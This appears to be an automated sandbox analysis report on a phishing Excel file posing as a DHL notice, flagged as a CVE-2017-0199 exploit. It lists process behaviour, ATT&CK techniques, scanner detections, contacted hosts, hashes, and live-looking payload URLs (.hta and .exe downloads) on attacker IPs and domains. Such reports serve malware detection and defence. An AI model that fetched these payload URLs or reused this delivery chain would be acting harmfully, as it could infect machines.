Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: DHL 733988905ZHH.xla.xlsxStream path 'MBD0077BD89/MBD00320C7F/Package' entropy: 7.98905669124 (max. 8.0)
Source: DHL 733988905ZHH.xla.xlsxStream path 'Workbook' entropy: 7.99152403099 (max. 8.0)
Source: 11160000.0.drStream path 'MBD0077BD89/MBD00320C7F/Package' entropy: 7.98905669124 (max. 8.0)
Source: 11160000.0.drStream path 'Workbook' entropy: 7.95596342925 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 758Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
3
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
DHL 733988905ZHH.xla.xlsx50%VirustotalBrowse
DHL 733988905ZHH.xla.xlsx33%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
DHL 733988905ZHH.xla.xlsx100%AviraW97M/AVI.Agent.dfbax
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://kryx.ru/RNF52o?&vestment=hard&firewall=tasteless&bread=rapid&beneficiary0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
onedscolprdcus07.centralus.cloudapp.azure.com
52.182.143.209
truefalse
    high
    a726.dscd.akamai.net
    2.16.164.131
    truefalse
      high
      kryx.ru
      188.225.72.170
      truefalse
        unknown
        s-0005.dual-s-msedge.net
        52.123.129.14
        truefalse
          high
          s-part-0032.t-0009.t-msedge.net
          13.107.246.60
          truefalse
            high
            a233.dscd.akamai.net
            2.16.164.19
            truefalse
              unknown
              assets.msn.com
              unknown
              unknownfalse
                high
                browser.events.data.msn.cn
                unknown
                unknownfalse
                  high
                  18.31.95.13.in-addr.arpa
                  unknown
                  unknownfalse
                    high
                    otelrules.svc.static.microsoft
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://kryx.ru/RNF52o?&vestment=hard&firewall=tasteless&bread=rapid&beneficiaryfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://browser.events.data.msn.cn/OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=c498711f02654edca8a715ca6e1cb4d4-dc31da17-845c-4cca-84e5-547d05dad708-6945&upload-time=1742025000584&w=0&anoncknm=al_app_anon&NoResponseBody=truefalse
                        high
                        https://otelrules.svc.static.microsoft/rules/rule170146v0s19.xmlfalse
                          high
                          https://otelrules.svc.static.microsoft/rules/rule120201v19s19.xmlfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            198.12.89.24
                            unknownUnited States
                            36352AS-COLOCROSSINGUSfalse
                            188.225.72.170
                            kryx.ruRussian Federation
                            9123TIMEWEB-ASRUfalse
                            13.107.246.60
                            s-part-0032.t-0009.t-msedge.netUnited States
                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                            Joe Sandbox version:42.0.0 Malachite
                            Analysis ID:1639267
                            Start date and time:2025-03-15 08:49:03 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 41s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:defaultwindowsofficecookbook.jbs
                            Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
                            Run name:Potential for more IOCs and behavior
                            Number of analysed new started processes analysed:19
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • GSI enabled (VBA)
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:DHL 733988905ZHH.xla.xlsx
                            Detection:MAL
                            Classification:mal68.expl.winXLSX@6/13@5/3
                            EGA Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .xlsx
                            • Found Word or Excel or PowerPoint or XPS Viewer
                            • Attach to Office via COM
                            • Active ActiveX Object
                            • Active ActiveX Object
                            • Scroll down
                            • Close Viewer
                            • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.109.76.243, 52.111.227.28, 51.105.71.137, 52.123.129.14, 40.126.31.69, 52.149.20.212, 13.95.31.18, 20.150.78.196, 2.16.164.131, 2.16.164.65, 52.182.143.209
                            • Excluded domains from analysis (whitelisted): us1.odcsm1.live.com.akadns.net, odc.officeapps.live.com, slscr.update.microsoft.com, res-1.cdn.office.net, eur.roaming1.live.com.akadns.net, neu-azsc-000.roaming.officeapps.live.com, mobile.events.data.microsoft.com, roaming.officeapps.live.com, onedscolprduks03.uksouth.cloudapp.azure.com, dual-s-0005-office.config.skype.com, login.live.com, officeclient.microsoft.com, osiprod-cus-bronze-azsc-000.centralus.cloudapp.azure.com, ecs.office.com, prod.configsvc1.live.com.akadns.net, uci.cdn.office.net, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, cus-azsc-000.odc.officeapps.live.com, res-stls-prod.edgesuite.net, fe3cr.delivery.mp.microsoft.com, weathermapdata.blob.core.windows.net, res-prod.trafficmanager.net, config.officeapps.live.com, osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com, ecs.office.trafficmanager.net, res.cdn.office.net, europe.configsvc1.live.com.akadns.net, prod.odcsm1.live.com.akadns.net, mobile.events.data.trafficmanager.net,
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenFile calls found.
                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • Report size getting too big, too many NtSetValueKey calls found.
                            TimeTypeDescription
                            03:51:07API Interceptor800x Sleep call for process: splwow64.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            198.12.89.24wekissingbestgirleveryseenwithmygirl.htaGet hashmaliciousCobalt Strike, Snake Keylogger, VIP KeyloggerBrowse
                            • 198.12.89.24/312/cosse.exe
                            signed contract 01.xlsGet hashmaliciousUnknownBrowse
                            • 198.12.89.24/xampp/nso/wekissingbestgirleveryseenwithmygirl.hta
                            signed contract 01.xlsGet hashmaliciousUnknownBrowse
                            • 198.12.89.24/xampp/nso/wekissingbestgirleveryseenwithmygirl.hta
                            niceworkingskillwithbestideasevermade.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                            • 198.12.89.24/123/casse.exe
                            Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                            • 198.12.89.24/xampp/ncv/niceworkingskillwithbestideasevermade.hta
                            188.225.72.170_________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                              _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                                13.107.246.60https://protect-us.mimecast.com/s/wFHoCqxrAnt7V914iZaD1vGet hashmaliciousUnknownBrowse
                                • www.mimecast.com/Customers/Support/Contact-support/
                                http://wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5Get hashmaliciousUnknownBrowse
                                • wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                kryx.ru_________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                                • 188.225.72.170
                                _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                                • 188.225.72.170
                                onedscolprdcus07.centralus.cloudapp.azure.comtransferencia HSBC.xla.xlsxGet hashmaliciousUnknownBrowse
                                • 52.182.143.209
                                s-part-0032.t-0009.t-msedge.net(Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                                • 13.107.246.60
                                SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                                • 13.107.246.60
                                P0-0994-12.xlsGet hashmaliciousUnknownBrowse
                                • 13.107.246.60
                                (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                                • 13.107.246.60
                                SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                                • 13.107.246.60
                                Wacatac 0.5.exeGet hashmaliciousUnknownBrowse
                                • 13.107.246.60
                                Wacatac 0.5.exeGet hashmaliciousUnknownBrowse
                                • 13.107.246.60
                                Sweepingcorp00990__098.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 13.107.246.60
                                https://trezorewllet.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                • 13.107.246.60
                                a726.dscd.akamai.net(Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                                • 2.16.164.65
                                P0-0994-12.xlsGet hashmaliciousUnknownBrowse
                                • 2.22.242.9
                                SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                                • 2.22.242.145
                                SWIFTCOPY 20231707.docxGet hashmaliciousUnknownBrowse
                                • 2.22.242.128
                                SecuriteInfo.com.Other.Malware-gen.17831.10614.xlsxGet hashmaliciousUnknownBrowse
                                • 2.22.242.128
                                https://sp-track.info.socialmaud.digital/api/v1/track/click/355/30046/17/default/6b7d5c97-8b19-4c41-b355-64ecd84af44a?redirecturl=https://gamma.app/docs/POM-Technologies-Proposal-1tjhhormn8i5mpbGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                • 2.22.242.145
                                2025-027RC2-ORDEN AVOCOMEX.xlsGet hashmaliciousUnknownBrowse
                                • 2.22.242.112
                                ess.doc1.rtfGet hashmaliciousUnknownBrowse
                                • 2.22.242.138
                                ess.doc1.rtfGet hashmaliciousUnknownBrowse
                                • 2.22.242.145
                                _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                                • 2.22.242.122
                                s-0005.dual-s-msedge.net(Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                                • 52.123.128.14
                                SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                                • 52.123.128.14
                                P0-0994-12.xlsGet hashmaliciousUnknownBrowse
                                • 52.123.128.14
                                SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                                • 52.123.128.14
                                (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                                • 52.123.128.14
                                SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                                • 52.123.129.14
                                e25fb69..emlGet hashmaliciousUnknownBrowse
                                • 52.123.128.14
                                SWIFTCOPY 20231707.docxGet hashmaliciousUnknownBrowse
                                • 52.123.129.14
                                SWIFTCOPY 20231707.docxGet hashmaliciousUnknownBrowse
                                • 52.123.129.14
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                AS-COLOCROSSINGUS(Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                                • 192.3.95.138
                                SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                                • 172.245.123.24
                                SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                                • 172.245.123.24
                                (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                                • 192.3.95.138
                                SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                                • 172.245.123.24
                                hgfs.arm5.elfGet hashmaliciousUnknownBrowse
                                • 107.172.154.249
                                KKveTTgaAAsecNNaaaa.x86_64.elfGet hashmaliciousUnknownBrowse
                                • 192.3.129.109
                                2025-027RC2-ORDEN AVOCOMEX.xlsGet hashmaliciousUnknownBrowse
                                • 192.3.101.146
                                2025-027RC2-ORDEN AVOCOMEX.xlsGet hashmaliciousUnknownBrowse
                                • 192.3.101.146
                                TIMEWEB-ASRU_________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                                • 188.225.72.170
                                _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                                • 188.225.72.170
                                niga.jarGet hashmaliciousUnknownBrowse
                                • 2.59.41.142
                                GjThRAJ.exeGet hashmaliciousUnknownBrowse
                                • 2.59.41.142
                                splx86.elfGet hashmaliciousUnknownBrowse
                                • 92.53.113.157
                                i686.elfGet hashmaliciousMiraiBrowse
                                • 188.225.75.215
                                https://33kuritsi.ru/bitrix/redirect.php?event1=click_to_call&event2=&event3=&goto=https://gamma.app/docs/PDF-Scanned-Document-wldbj3tbiz3h3zk?mode=present#card-bc666izqridnjbrGet hashmaliciousHTMLPhisherBrowse
                                • 5.23.50.101
                                https://33kuritsi.ru/bitrix/redirect.php?event1=click_to_call&event2=&event3=&goto=https://gamma.app/docs/PDF-Scanned-Document-wldbj3tbiz3h3zk?mode=present#card-bc666izqridnjbrGet hashmaliciousUnknownBrowse
                                • 5.23.50.101
                                XkggQZnZYs.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                • 92.53.120.241
                                MICROSOFT-CORP-MSN-AS-BLOCKUS(Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                                • 13.107.246.60
                                SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                                • 13.107.246.60
                                P0-0994-12.xlsGet hashmaliciousUnknownBrowse
                                • 13.107.246.60
                                SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                                • 13.107.253.67
                                (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                                • 13.107.246.60
                                P0-0994-12.xlsGet hashmaliciousUnknownBrowse
                                • 52.123.128.14
                                hgfs.arm5.elfGet hashmaliciousUnknownBrowse
                                • 52.246.79.20
                                hgfs.mpsl.elfGet hashmaliciousUnknownBrowse
                                • 20.143.252.209
                                hgfs.mips.elfGet hashmaliciousUnknownBrowse
                                • 13.68.209.215
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                258a5a1e95b8a911872bae9081526644(Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                                • 13.107.246.60
                                P0-0994-12.xlsGet hashmaliciousUnknownBrowse
                                • 13.107.246.60
                                SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                                • 13.107.246.60
                                SecuriteInfo.com.Other.Malware-gen.17831.10614.xlsxGet hashmaliciousUnknownBrowse
                                • 13.107.246.60
                                2025-027RC2-ORDEN AVOCOMEX.xlsGet hashmaliciousUnknownBrowse
                                • 13.107.246.60
                                _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                                • 13.107.246.60
                                Quotation.xlsGet hashmaliciousUnknownBrowse
                                • 13.107.246.60
                                Copy of 1- GCP Vendor Information Smart Form Stepan.xlsmGet hashmaliciousUnknownBrowse
                                • 13.107.246.60
                                NEW_TENDER_LIST.xlsxGet hashmaliciousUnknownBrowse
                                • 13.107.246.60
                                PO #S149102025.xlsxGet hashmaliciousUnknownBrowse
                                • 13.107.246.60
                                No context
                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):118
                                Entropy (8bit):3.5700810731231707
                                Encrypted:false
                                SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                MD5:573220372DA4ED487441611079B623CD
                                SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                Malicious:false
                                Reputation:high, very likely benign file
